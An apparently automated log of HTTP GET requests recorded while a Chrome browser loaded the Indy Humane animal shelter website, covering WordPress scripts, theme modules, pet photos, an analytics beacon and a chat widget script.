Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.3 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/dd66daa9-9433-4f14-b223-5ee977a0676b.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/05/Logo_Horiz.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/a625a6f1-50ea-4357-b907-a08d636341db.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/general.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adoptablesearch/images/PetPlaceLogo.png HTTP/1.1Host: indyhumane.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/hero-dog.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2025/01/stuart-768x723.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /beacon.js HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/dd66daa9-9433-4f14-b223-5ee977a0676b.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/carousel.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-grid-compat.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/7a6849d0-0cb7-4f2e-a0e6-146335e8af7b.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/chat.js HTTP/1.1Host: cdn.customgpt.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/e9dac8f4-5d42-4282-b360-1c17bf4033f7.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/a625a6f1-50ea-4357-b907-a08d636341db.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/hero-dog.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/fe090341-f359-4d15-a7d0-260c04791544.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2025/01/stuart-768x723.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-list.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /beacon.js HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/06/get-involved-home.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/post-grid-compat.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/7a6849d0-0cb7-4f2e-a0e6-146335e8af7b.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/06/donate.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/06/clinics.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/chat.js HTTP/1.1Host: cdn.customgpt.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
